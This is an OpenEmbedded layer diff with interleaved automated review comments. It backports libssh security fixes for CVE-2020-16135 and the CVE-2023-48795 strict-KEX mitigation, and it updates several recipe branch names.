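Review bot: The added overflow test divides by `H5T_get_size(attr->shared->dt)` without first checking that the size is non-zero. If a malformed file can make the datatype size come back as 0 (not determinable from this hunk), the check meant to stop the overflow would itself fault on a division by zero. Rejecting that case before the `H5_CHECKED_ASSIGN` line closes the gap, for example `if (0 == H5T_get_size(attr->shared->dt)) HGOTO_ERROR(H5E_ATTR, H5E_CANTGET, NULL, "unable to get datatype size");`. It is also worth comparing against the upstream commit named in Upstream-Status to see whether it validates both operands before multiplying. H5O_attr_decode starts and ends outside the inner hunk.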
@@ -17,6 +17,7 @@ SRC_URI = " \ file://0001-cross-compiling-support.patch \ file://0002-Remove-suffix-shared-from-shared-library-name.patch \ file://0001-cmake-remove-build-flags.patch \ + file://CVE-2021-37501.patch \ " SRC_URI[md5sum] = "2d2408f2a9dfb5c7b79998002e9a90e9" SRC_URI[sha256sum] = "e5b1b1dee44a64b795a91c3321ab7196d9e0871fe50d42969761794e3899f40d" diff --git a/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb b/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb index 154973254d..abafaaf7a7 100644 --- a/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb +++ b/meta-oe/recipes-support/libbytesize/libbytesize_2.6.bb @@ -10,7 +10,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "c9864f4dd03736839f40d225da494cb1eb64e654" -SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=master;protocol=https" +SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=main;protocol=https" inherit gettext autotools pkgconfig python3native diff --git a/meta-oe/recipes-support/libiio/libiio_git.bb b/meta-oe/recipes-support/libiio/libiio_git.bb index bb253f421a..612dd897be 100644 --- a/meta-oe/recipes-support/libiio/libiio_git.bb +++ b/meta-oe/recipes-support/libiio/libiio_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING.txt;md5=7c13b3376cea0ce68d2d2da0a1b3a72c" SRCREV = "92d6a35f3d8d721cda7d6fe664b435311dd368b4" PV = "0.23" -SRC_URI = "git://github.com/analogdevicesinc/libiio.git;protocol=https;branch=master \ +SRC_URI = "git://github.com/analogdevicesinc/libiio.git;protocol=https;branch=main \ file://0001-CMake-Move-include-CheckCSourceCompiles-before-its-m.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)" diff --git a/meta-oe/recipes-support/libmxml/libmxml_3.3.bb b/meta-oe/recipes-support/libmxml/libmxml_3.3.bb index c8e2167795..5169337f58 100644 --- a/meta-oe/recipes-support/libmxml/libmxml_3.3.bb +++ b/meta-oe/recipes-support/libmxml/libmxml_3.3.bb 
@@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=86d3f3a95c324c9479bd8986968f4327" HOMEPAGE = "https://www.msweet.org/mxml/" BUGTRACKER = "https://github.com/michaelrsweet/mxml/issues" -SRC_URI = "git://github.com/michaelrsweet/mxml.git;nobranch=1;protocol=https" +SRC_URI = "git://github.com/michaelrsweet/mxml.git;branch=master;protocol=https" SRCREV = "0237559fdbcecae34157b547aa2b99e12de305a2" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2020-16135.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2020-16135.patch new file mode 100644 index 0000000000..63b78688dd --- /dev/null +++ b/meta-oe/recipes-support/libssh/libssh/CVE-2020-16135.patch 
@@ -0,0 +1,44 @@
+From 0a9268a60f2d3748ca69bde5651f20e72761058c Mon Sep 17 00:00:00 2001
+From: Andreas Schneider <asn@cryptomilk.org>
+Date: Wed, 3 Jun 2020 10:04:09 +0200
+Subject: CVE-2020-16135: Add missing NULL check for ssh_buffer_new()
+
+Add a missing NULL check for the pointer returned by ssh_buffer_new() in
+sftpserver.c.
+
+Thanks to Ramin Farajpour Cami for spotting this.
+
+Fixes T232
+
+Signed-off-by: Andreas Schneider <asn@cryptomilk.org>
+Reviewed-by: Anderson Toshiyuki Sasaki <ansasaki@redhat.com>
+Reviewed-by: Jakub Jelen <jjelen@redhat.com>
+(cherry picked from commit 533d881b0f4b24c72b35ecc97fa35d295d063e53)
+
+Upstream-Status: Backport [https://git.libssh.org/projects/libssh.git/patch/?id=0a9268a60f2d3748ca69bde5651f20e72761058c]
+CVE: CVE-2020-16135
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/sftpserver.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/sftpserver.c b/src/sftpserver.c
+index 1717aa417..1af8a0e76 100644
+--- a/src/sftpserver.c
++++ b/src/sftpserver.c
+@@ -64,6 +64,12 @@ sftp_client_message sftp_get_client_message(sftp_session sftp) {
+
+ /* take a copy of the whole packet */
+ msg->complete_message = ssh_buffer_new();
++ if (msg->complete_message == NULL) {
++ ssh_set_error_oom(session);
++ sftp_client_message_free(msg);
++ return NULL;
++ }
++
+ ssh_buffer_add_data(msg->complete_message,
+ ssh_buffer_get(payload),
+ ssh_buffer_get_len(payload));
+--
+2.25.1
+
diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-1.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-1.patch
new file mode 100644
index 0000000000..413e5b3d11
--- /dev/null
+++ b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-1.patch
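Review bot: The call right after the new NULL check, `ssh_buffer_add_data(msg->complete_message, …)`, still discards its return value, so a failure while copying the payload may leave `complete_message` without the packet data while sftp_get_client_message carries on as if the copy succeeded. The same cleanup the patch adds for `ssh_buffer_new()` fits that call as well; the lines below show it. This assumes ssh_buffer_add_data reports failure with a negative return, and the function body continues outside the inner hunk.

```c
    msg->complete_message = ssh_buffer_new();
    /* … unchanged: NULL check added by this patch … */
    if (ssh_buffer_add_data(msg->complete_message,
                            ssh_buffer_get(payload),
                            ssh_buffer_get_len(payload)) < 0) {
        ssh_set_error_oom(session);
        sftp_client_message_free(msg);
        return NULL;
    }
```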
@@ -0,0 +1,385 @@ +From 4cef5e965a46e9271aed62631b152e4bd23c1e3c Mon Sep 17 00:00:00 2001 +From: Aris Adamantiadis <aris@0xbadc0de.be> +Date: Tue, 12 Dec 2023 23:09:57 +0100 +Subject: [PATCH] CVE-2023-48795: client side mitigation + +Signed-off-by: Aris Adamantiadis <aris@0xbadc0de.be> +Signed-off-by: Jakub Jelen <jjelen@redhat.com> +Reviewed-by: Andreas Schneider <asn@cryptomilk.org> + +Upstream-Status: Backport [https://gitlab.com/libssh/libssh-mirror/-/commit/4cef5e965a46e9271aed62631b152e4bd23c1e3c] +CVE: CVE-2023-48795 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + include/libssh/packet.h | 1 + + include/libssh/session.h | 6 +++++ + src/curve25519.c | 18 +++---------- + src/dh.c | 6 +---- + src/ecdh.c | 7 +---- + src/ecdh_crypto.c | 10 ++----- + src/ecdh_gcrypt.c | 10 +++---- + src/ecdh_mbedcrypto.c | 11 +++----- + src/kex.c | 34 ++++++++++++++++++++---- + src/packet.c | 56 +++++++++++++++++++++++++++++++++++++++- + src/packet_cb.c | 12 +++++++++ + 11 files changed, 118 insertions(+), 53 deletions(-) + +diff --git a/include/libssh/packet.h b/include/libssh/packet.h +index fbe09700..8800e16b 100644 +--- a/include/libssh/packet.h ++++ b/include/libssh/packet.h +@@ -63,6 +63,7 @@ SSH_PACKET_CALLBACK(ssh_packet_ext_info); + SSH_PACKET_CALLBACK(ssh_packet_kexdh_init); + #endif + ++int ssh_packet_send_newkeys(ssh_session session); + int ssh_packet_send_unimplemented(ssh_session session, uint32_t seqnum); + int ssh_packet_parse_type(ssh_session session); + //int packet_flush(ssh_session session, int enforce_blocking); +diff --git a/include/libssh/session.h b/include/libssh/session.h +index 23633cc2..b8810f54 100644 +--- a/include/libssh/session.h ++++ b/include/libssh/session.h +@@ -69,6 +69,12 @@ enum ssh_pending_call_e { + /* Client successfully authenticated */ + #define SSH_SESSION_FLAG_AUTHENTICATED 2 + ++/* The current SSH2 session implements the "strict KEX" feature and should behave ++ * differently on SSH2_MSG_NEWKEYS. 
*/ ++#define SSH_SESSION_FLAG_KEX_STRICT 0x0010 ++/* Unexpected packets have been sent while the session was still unencrypted */ ++#define SSH_SESSION_FLAG_KEX_TAINTED 0x0020 ++ + /* codes to use with ssh_handle_packets*() */ + /* Infinite timeout */ + #define SSH_TIMEOUT_INFINITE -1 +diff --git a/src/curve25519.c b/src/curve25519.c +index 167209f4..6eda5feb 100644 +--- a/src/curve25519.c ++++ b/src/curve25519.c +@@ -166,12 +166,7 @@ int ssh_client_curve25519_reply(ssh_session session, ssh_buffer packet){ + } + + /* Send the MSG_NEWKEYS */ +- if (ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS) < 0) { +- goto error; +- } +- +- rc=ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ rc = ssh_packet_send_newkeys(session); + return rc; + error: + return SSH_ERROR; +@@ -297,15 +292,10 @@ int ssh_server_curve25519_init(ssh_session session, ssh_buffer packet){ + return SSH_ERROR; + } + +- /* Send the MSG_NEWKEYS */ +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc < 0) { +- goto error; +- } +- + session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_packet_send_newkeys(session); + + return rc; + error: +diff --git a/src/dh.c b/src/dh.c +index cc12fd46..33883f2d 100644 +--- a/src/dh.c ++++ b/src/dh.c +@@ -735,11 +735,7 @@ int ssh_client_dh_reply(ssh_session session, ssh_buffer packet){ + } + + /* Send the MSG_NEWKEYS */ +- if (ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS) < 0) { +- goto error; +- } +- +- rc=ssh_packet_send(session); ++ rc = ssh_packet_send_newkeys(session); + SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); + return rc; + error: +diff --git a/src/ecdh.c b/src/ecdh.c +index f7fcaf13..1fef7ec9 100644 +--- a/src/ecdh.c ++++ b/src/ecdh.c +@@ -72,12 +72,7 @@ int ssh_client_ecdh_reply(ssh_session session, ssh_buffer packet){ + } + + /* Send the MSG_NEWKEYS 
*/ +- if (ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS) < 0) { +- goto error; +- } +- +- rc=ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ rc = ssh_packet_send_newkeys(session); + return rc; + error: + return SSH_ERROR; +diff --git a/src/ecdh_crypto.c b/src/ecdh_crypto.c +index 24f21c03..7e5f0cc7 100644 +--- a/src/ecdh_crypto.c ++++ b/src/ecdh_crypto.c +@@ -318,15 +318,9 @@ int ssh_server_ecdh_init(ssh_session session, ssh_buffer packet){ + return SSH_ERROR; + } + +- /* Send the MSG_NEWKEYS */ +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc < 0) { +- return SSH_ERROR;; +- } +- + session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_packet_send_newkeys(session); + + return rc; + } +diff --git a/src/ecdh_gcrypt.c b/src/ecdh_gcrypt.c +index e43cacea..c1db7f5d 100644 +--- a/src/ecdh_gcrypt.c ++++ b/src/ecdh_gcrypt.c +@@ -362,17 +362,13 @@ int ssh_server_ecdh_init(ssh_session session, ssh_buffer packet) { + goto out; + } + +- ++ session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; + /* Send the MSG_NEWKEYS */ +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc != SSH_OK) { ++ rc = ssh_packet_send_newkeys(session); ++ if (rc == SSH_ERROR) { + goto out; + } + +- session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); +- + out: + gcry_sexp_release(param); + gcry_sexp_release(key); +diff --git a/src/ecdh_mbedcrypto.c b/src/ecdh_mbedcrypto.c +index fa350028..24924508 100644 +--- a/src/ecdh_mbedcrypto.c ++++ b/src/ecdh_mbedcrypto.c +@@ -293,16 +293,13 @@ int ssh_server_ecdh_init(ssh_session session, ssh_buffer packet) + goto out; + } + +- rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); +- if (rc < 0) { +- rc = SSH_ERROR; ++ session->dh_handshake_state = 
DH_STATE_NEWKEYS_SENT; ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_packet_send_newkeys(session); ++ if (rc == SSH_ERROR) { + goto out; + } + +- session->dh_handshake_state = DH_STATE_NEWKEYS_SENT; +- rc = ssh_packet_send(session); +- SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent"); +- + out: + mbedtls_ecp_group_free(&grp); + return rc; +diff --git a/src/kex.c b/src/kex.c +index 82686e4b..7f1bb324 100644 +--- a/src/kex.c ++++ b/src/kex.c +@@ -105,6 +105,9 @@ + + /* RFC 8308 */ + #define KEX_EXTENSION_CLIENT "ext-info-c" ++/* Strict kex mitigation against CVE-2023-48795 */ ++#define KEX_STRICT_CLIENT "kex-strict-c-v00@openssh.com" ++#define KEX_STRICT_SERVER "kex-strict-s-v00@openssh.com" + + /* NOTE: This is a fixed API and the index is defined by ssh_kex_types_e */ + static const char *default_methods[] = { +@@ -521,6 +524,27 @@ SSH_PACKET_CALLBACK(ssh_packet_kexinit){ + goto error; + } + ++ /* ++ * handle the "strict KEX" feature. If supported by peer, then set up the ++ * flag and verify packet sequence numbers. ++ */ ++ if (server_kex) { ++ ok = ssh_match_group(session->next_crypto->client_kex.methods[SSH_KEX], ++ KEX_STRICT_CLIENT); ++ if (ok) { ++ SSH_LOG(SSH_LOG_DEBUG, "Client supports strict kex, enabling."); ++ session->flags |= SSH_SESSION_FLAG_KEX_STRICT; ++ } ++ } else { ++ /* client kex */ ++ ok = ssh_match_group(session->next_crypto->server_kex.methods[SSH_KEX], ++ KEX_STRICT_SERVER); ++ if (ok) { ++ SSH_LOG(SSH_LOG_DEBUG, "Server supports strict kex, enabling."); ++ session->flags |= SSH_SESSION_FLAG_KEX_STRICT; ++ } ++ } ++ + /* + * If client sent a ext-info-c message in the kex list, it supports + * RFC 8308 extension negotiation. 
+@@ -778,21 +802,21 @@ int ssh_set_client_kex(ssh_session session) + return SSH_OK; + } + +- /* Here we append ext-info-c to the list of kex algorithms */ ++ /* Here we append ext-info-c and kex-strict-c-v00@openssh.com to the list of kex algorithms */ + kex = client->methods[SSH_KEX]; + len = strlen(kex); +- if (len + strlen(KEX_EXTENSION_CLIENT) + 2 < len) { ++ /* Comma, comma, nul byte */ ++ kex_len = len + 1 + strlen(KEX_EXTENSION_CLIENT) + 1 + strlen(KEX_STRICT_CLIENT ) + 1; ++ if (kex_len >= MAX_PACKET_LEN) { + /* Overflow */ + return SSH_ERROR; + } +- kex_len = len + strlen(KEX_EXTENSION_CLIENT) + 2; /* comma, NULL */ + kex_tmp = realloc(kex, kex_len); + if (kex_tmp == NULL) { +- free(kex); + ssh_set_error_oom(session); + return SSH_ERROR; + } +- snprintf(kex_tmp + len, kex_len - len, ",%s", KEX_EXTENSION_CLIENT); ++ snprintf(kex_tmp + len, kex_len - len, ",%s,%s", KEX_EXTENSION_CLIENT, KEX_STRICT_CLIENT); + client->methods[SSH_KEX] = kex_tmp; + + return SSH_OK; +diff --git a/src/packet.c b/src/packet.c +index 61a44237..8025a7ff 100644 +--- a/src/packet.c ++++ b/src/packet.c +@@ -1126,6 +1126,19 @@ int ssh_packet_socket_callback(const void *data, size_t receivedlen, void *user) + } + #endif /* WITH_ZLIB */ + payloadsize = ssh_buffer_get_len(session->in_buffer); ++ if (session->recv_seq == UINT32_MAX) { ++ /* Overflowing sequence numbers is always fishy */ ++ if (session->current_crypto == NULL) { ++ /* don't allow sequence number overflow when unencrypted */ ++ ssh_set_error(session, ++ SSH_FATAL, ++ "Incoming sequence number overflow"); ++ goto error; ++ } else { ++ SSH_LOG(SSH_LOG_WARNING, ++ "Incoming sequence number overflow"); ++ } ++ } + session->recv_seq++; + if (session->raw_counter != NULL) { + session->raw_counter->in_bytes += payloadsize; +@@ -1141,7 +1154,19 @@ int ssh_packet_socket_callback(const void *data, size_t receivedlen, void *user) + SSH_LOG(SSH_LOG_PACKET, + "packet: read type %hhd [len=%d,padding=%hhd,comp=%d,payload=%d]", + 
session->in_packet.type, packet_len, padding, compsize, payloadsize); +- ++ if (session->current_crypto == NULL) { ++ /* In strict kex, only a few packets are allowed. Taint the session ++ * if we received packets that are normally allowed but to be ++ * refused if we are in strict kex when KEX is over. ++ */ ++ uint8_t type = session->in_packet.type; ++ ++ if (type != SSH2_MSG_KEXINIT && type != SSH2_MSG_NEWKEYS && ++ (type < SSH2_MSG_KEXDH_INIT || ++ type > SSH2_MSG_KEX_DH_GEX_REQUEST)) { ++ session->flags |= SSH_SESSION_FLAG_KEX_TAINTED; ++ } ++ } + /* Check if the packet is expected */ + filter_result = ssh_packet_incoming_filter(session); + +@@ -1153,6 +1178,9 @@ int ssh_packet_socket_callback(const void *data, size_t receivedlen, void *user) + case SSH_PACKET_DENIED: + goto error; + case SSH_PACKET_UNKNOWN: ++ if (session->current_crypto == NULL) { ++ session->flags |= SSH_SESSION_FLAG_KEX_TAINTED; ++ } + ssh_packet_send_unimplemented(session, session->recv_seq - 1); + break; + } +@@ -1276,9 +1304,35 @@ void ssh_packet_process(ssh_session session, uint8_t type){ + if(r==SSH_PACKET_NOT_USED){ + SSH_LOG(SSH_LOG_RARE,"Couldn't do anything with packet type %d",type); + ssh_packet_send_unimplemented(session, session->recv_seq-1); ++ if (session->current_crypto == NULL) { ++ session->flags |= SSH_SESSION_FLAG_KEX_TAINTED; ++ } + } + } + ++/** @internal ++ * @brief sends a SSH_MSG_NEWKEYS when enabling the new negotiated ciphers ++ * @param session the SSH session ++ * @return SSH_ERROR on error, else SSH_OK ++ */ ++int ssh_packet_send_newkeys(ssh_session session) ++{ ++ int rc; ++ ++ /* Send the MSG_NEWKEYS */ ++ rc = ssh_buffer_add_u8(session->out_buffer, SSH2_MSG_NEWKEYS); ++ if (rc < 0) { ++ return rc; ++ } ++ ++ rc = ssh_packet_send(session); ++ if (rc == SSH_ERROR) { ++ return rc; ++ } ++ SSH_LOG(SSH_LOG_DEBUG, "SSH_MSG_NEWKEYS sent"); ++ return rc; ++} ++ + /** @internal + * @brief sends a SSH_MSG_UNIMPLEMENTED answer to an unhandled packet + * @param session 
the SSH session +diff --git a/src/packet_cb.c b/src/packet_cb.c +index 6aa64766..de03fb07 100644 +--- a/src/packet_cb.c ++++ b/src/packet_cb.c +@@ -154,6 +154,18 @@ SSH_PACKET_CALLBACK(ssh_packet_newkeys){ + goto error; + } + ++ if (session->flags & SSH_SESSION_FLAG_KEX_STRICT) { ++ /* reset packet sequence number when running in strict kex mode */ ++ session->recv_seq = 0; ++ /* Check that we aren't tainted */ ++ if (session->flags & SSH_SESSION_FLAG_KEX_TAINTED) { ++ ssh_set_error(session, ++ SSH_FATAL, ++ "Received unexpected packets in strict KEX mode."); ++ goto error; ++ } ++} ++ + if(session->server){ + /* server things are done in server.c */ + session->dh_handshake_state=DH_STATE_FINISHED; +-- +2.25.1 + diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-2.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-2.patch new file mode 100644 index 0000000000..fe3300503f --- /dev/null +++ b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-2.patch 
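Review bot: Only the receive side is reset for strict KEX in this patch: `ssh_packet_newkeys` in src/packet_cb.c sets `session->recv_seq = 0`, but none of the visible hunks touches `session->send_seq`, and the new `ssh_packet_send_newkeys` in src/packet.c only queues and sends the message. If the outgoing counter is not reset elsewhere in this 0.8 tree once SSH2_MSG_NEWKEYS has gone out, the two directions will disagree about sequence numbers as soon as a peer negotiates strict KEX, so it is worth confirming against the upstream commit that no packet-send hunk was lost in the backport. Two smaller leftovers: src/dh.c keeps its own `SSH_LOG(SSH_LOG_PROTOCOL, "SSH_MSG_NEWKEYS sent")` after the helper call, so the message is logged twice and also on failure, and the closing `}` of the strict-KEX block in packet_cb.c sits at column 0.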
@@ -0,0 +1,126 @@ +From 0870c8db28be9eb457ee3d4f9a168959d9507efd Mon Sep 17 00:00:00 2001 +From: Aris Adamantiadis <aris@0xbadc0de.be> +Date: Tue, 12 Dec 2023 23:30:26 +0100 +Subject: [PATCH] CVE-2023-48795: Server side mitigations + +Signed-off-by: Aris Adamantiadis <aris@0xbadc0de.be> +Signed-off-by: Jakub Jelen <jjelen@redhat.com> +Reviewed-by: Andreas Schneider <asn@cryptomilk.org> + +Upstream-Status: Backport [https://gitlab.com/libssh/libssh-mirror/-/commit/0870c8db28be9eb457ee3d4f9a168959d9507efd] +CVE: CVE-2023-48795 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + include/libssh/kex.h | 1 + + src/kex.c | 46 ++++++++++++++++++++++++++++++++++---------- + src/server.c | 8 +++++++- + 3 files changed, 44 insertions(+), 11 deletions(-) + +diff --git a/include/libssh/kex.h b/include/libssh/kex.h +index a626d105..2b1a74d5 100644 +--- a/include/libssh/kex.h ++++ b/include/libssh/kex.h +@@ -36,6 +36,7 @@ SSH_PACKET_CALLBACK(ssh_packet_kexinit); + int ssh_send_kex(ssh_session session, int server_kex); + void ssh_list_kex(struct ssh_kex_struct *kex); + int ssh_set_client_kex(ssh_session session); ++int ssh_kex_append_extensions(ssh_session session, struct ssh_kex_struct *pkex); + int ssh_kex_select_methods(ssh_session session); + int ssh_verify_existing_algo(enum ssh_kex_types_e algo, const char *name); + char *ssh_keep_known_algos(enum ssh_kex_types_e algo, const char *list); +diff --git a/src/kex.c b/src/kex.c +index 2ed90235..b03e6484 100644 +--- a/src/kex.c ++++ b/src/kex.c +@@ -766,11 +766,8 @@ int ssh_set_client_kex(ssh_session session) + { + struct ssh_kex_struct *client= &session->next_crypto->client_kex; + const char *wanted; +- char *kex = NULL; +- char *kex_tmp = NULL; + int ok; + int i; +- size_t kex_len, len; + + ok = ssh_get_random(client->cookie, 16, 0); + if (!ok) { +@@ -802,11 +799,33 @@ int ssh_set_client_kex(ssh_session session) + return SSH_OK; + } + +- /* Here we append ext-info-c and kex-strict-c-v00@openssh.com to the list of kex 
algorithms */ +- kex = client->methods[SSH_KEX]; ++ ok = ssh_kex_append_extensions(session, client); ++ if (ok != SSH_OK){ ++ return ok; ++ } ++ ++ return SSH_OK; ++} ++ ++int ssh_kex_append_extensions(ssh_session session, struct ssh_kex_struct *pkex) ++{ ++ char *kex = NULL; ++ char *kex_tmp = NULL; ++ size_t kex_len, len; ++ ++ /* Here we append ext-info-c and kex-strict-c-v00@openssh.com for client ++ * and kex-strict-s-v00@openssh.com for server to the list of kex algorithms ++ */ ++ kex = pkex->methods[SSH_KEX]; + len = strlen(kex); +- /* Comma, comma, nul byte */ +- kex_len = len + 1 + strlen(KEX_EXTENSION_CLIENT) + 1 + strlen(KEX_STRICT_CLIENT ) + 1; ++ if (session->server) { ++ /* Comma, nul byte */ ++ kex_len = len + 1 + strlen(KEX_STRICT_SERVER) + 1; ++ } else { ++ /* Comma, comma, nul byte */ ++ kex_len = len + 1 + strlen(KEX_EXTENSION_CLIENT) + 1 + ++ strlen(KEX_STRICT_CLIENT) + 1; ++ } + if (kex_len >= MAX_PACKET_LEN) { + /* Overflow */ + return SSH_ERROR; +@@ -816,9 +835,16 @@ int ssh_set_client_kex(ssh_session session) + ssh_set_error_oom(session); + return SSH_ERROR; + } +- snprintf(kex_tmp + len, kex_len - len, ",%s,%s", KEX_EXTENSION_CLIENT, KEX_STRICT_CLIENT); +- client->methods[SSH_KEX] = kex_tmp; +- ++ if (session->server){ ++ snprintf(kex_tmp + len, kex_len - len, ",%s", KEX_STRICT_SERVER); ++ } else { ++ snprintf(kex_tmp + len, ++ kex_len - len, ++ ",%s,%s", ++ KEX_EXTENSION_CLIENT, ++ KEX_STRICT_CLIENT); ++ } ++ pkex->methods[SSH_KEX] = kex_tmp; + return SSH_OK; + } + +diff --git a/src/server.c b/src/server.c +index bc98da4f..f3d24a7b 100644 +--- a/src/server.c ++++ b/src/server.c +@@ -158,7 +158,13 @@ static int server_set_kex(ssh_session session) { + } + } + +- return 0; ++ /* Do not append the extensions during rekey */ ++ if (session->flags & SSH_SESSION_FLAG_AUTHENTICATED) { ++ return SSH_OK; ++ } ++ ++ rc = ssh_kex_append_extensions(session, server); ++ return rc; + } + + int ssh_server_init_kex(ssh_session session) { +-- +2.25.1 + 
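Review bot: `ssh_kex_append_extensions` is exported through include/libssh/kex.h with no doc comment, and its contract is not obvious from the signature: it picks the client or server markers from `session->server`, not from which `pkex` the caller passes, and it replaces `pkex->methods[SSH_KEX]` with a new buffer. A short `/** @internal @brief ... @param ... @return SSH_OK or SSH_ERROR */` block above the definition should say that the caller must pass the kex struct matching the session role and that it must run only once per list, not on rekey. In `ssh_set_client_kex` the tail can then be just `return ssh_kex_append_extensions(session, client);`, which also avoids reusing `ok` (a boolean for `ssh_get_random`) as an SSH_OK/SSH_ERROR code.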
diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-3.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-3.patch
new file mode 100644
index 0000000000..1635a4c2dc
--- /dev/null
+++ b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-3.patch
@@ -0,0 +1,47 @@
+From 5846e57538c750c5ce67df887d09fa99861c79c6 Mon Sep 17 00:00:00 2001
+From: Jakub Jelen <jjelen@redhat.com>
+Date: Thu, 14 Dec 2023 12:22:01 +0100
+Subject: [PATCH] CVE-2023-48795: Strip extensions from both kex lists for
+ matching
+
+Signed-off-by: Jakub Jelen <jjelen@redhat.com>
+Reviewed-by: Andreas Schneider <asn@cryptomilk.org>
+
+Upstream-Status: Backport [https://gitlab.com/libssh/libssh-mirror/-/commit/5846e57538c750c5ce67df887d09fa99861c79c6]
+CVE: CVE-2023-48795
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/kex.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/src/kex.c b/src/kex.c
+index b03e6484..c100d908 100644
+--- a/src/kex.c
++++ b/src/kex.c
+@@ -857,11 +857,19 @@ int ssh_kex_select_methods (ssh_session session){
+ char *ext_start = NULL;
+ int i;
+
+- /* Here we should drop the ext-info-c from the list so we avoid matching.
++ /* Here we should drop the extensions from the list so we avoid matching.
+ * it. We added it to the end, so we can just truncate the string here */
+- ext_start = strstr(client->methods[SSH_KEX], ","KEX_EXTENSION_CLIENT);
+- if (ext_start != NULL) {
+- ext_start[0] = '\0';
++ if (session->client) {
++ ext_start = strstr(client->methods[SSH_KEX], "," KEX_EXTENSION_CLIENT);
++ if (ext_start != NULL) {
++ ext_start[0] = '\0';
++ }
++ }
++ if (session->server) {
++ ext_start = strstr(server->methods[SSH_KEX], "," KEX_STRICT_SERVER);
++ if (ext_start != NULL) {
++ ext_start[0] = '\0';
++ }
+ }
+
+ for (i = 0; i < KEX_METHODS_SIZE; i++) {
+--
+2.25.1
+
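Review bot: The truncation in `ssh_kex_select_methods` only works while the markers stay at the tail of the list in the order `ssh_kex_append_extensions` writes them: on the client it cuts at `",ext-info-c"` and relies on `kex-strict-c-v00@openssh.com` coming after it. The comment above the block does not say so and still contains the broken sentence "avoid matching. it. We added it to the end". I would replace it with something like `/* Drop our own pseudo-algorithms before matching; ssh_kex_append_extensions() appends them last, so truncating at the first one removes them all. */`. The function body continues outside the hunk.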
diff --git a/meta-oe/recipes-support/libssh/libssh_0.8.9.bb b/meta-oe/recipes-support/libssh/libssh_0.8.9.bb index c7e9c3320c..530dda1f4a 100644 --- a/meta-oe/recipes-support/libssh/libssh_0.8.9.bb +++ b/meta-oe/recipes-support/libssh/libssh_0.8.9.bb @@ -6,7 +6,12 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=dabb4958b830e5df11d2b0ed8ea255a0" DEPENDS = "zlib openssl" -SRC_URI = "git://git.libssh.org/projects/libssh.git;protocol=https;branch=stable-0.8" +SRC_URI = "git://git.libssh.org/projects/libssh.git;protocol=https;branch=stable-0.8 \ + file://CVE-2020-16135.patch \ + file://CVE-2023-48795-1.patch \ + file://CVE-2023-48795-2.patch \ + file://CVE-2023-48795-3.patch \ + " SRCREV = "04685a74df9ce1db1bc116a83a0da78b4f4fa1f8" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/multipath-tools/files/0001-multipath-tools-use-run-instead-of-dev-shm.patch b/meta-oe/recipes-support/multipath-tools/files/0001-multipath-tools-use-run-instead-of-dev-shm.patch new file mode 100644 index 0000000000..dd6af413ef --- /dev/null +++ b/meta-oe/recipes-support/multipath-tools/files/0001-multipath-tools-use-run-instead-of-dev-shm.patch 
